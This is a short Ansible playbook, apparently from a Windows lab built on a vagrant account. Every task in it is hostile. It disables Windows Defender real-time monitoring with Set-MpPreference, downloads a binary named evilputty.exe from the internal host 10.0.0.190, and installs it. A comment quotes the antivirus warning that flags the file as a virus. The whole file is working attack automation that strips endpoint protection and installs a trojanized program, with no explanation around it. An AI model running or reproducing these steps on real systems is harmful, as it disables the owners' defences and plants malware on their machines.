---
# Operation did not complete successfully because the file contains a virus or potentially unwanted software.
- name: disable windows defender
  win_shell: Set-MpPreference -DisableRealtimeMonitoring $true

- name: download evilputty.exe
  win_get_url:
    url: http://10.0.0.190/evilputty.exe
    dest: C:\Users\vagrant\evilputty.exe

- name: install evilputty
  win_package:
    path: C:\Users\vagrant\evilputty.exe
    product_id: evilputty
    state: present
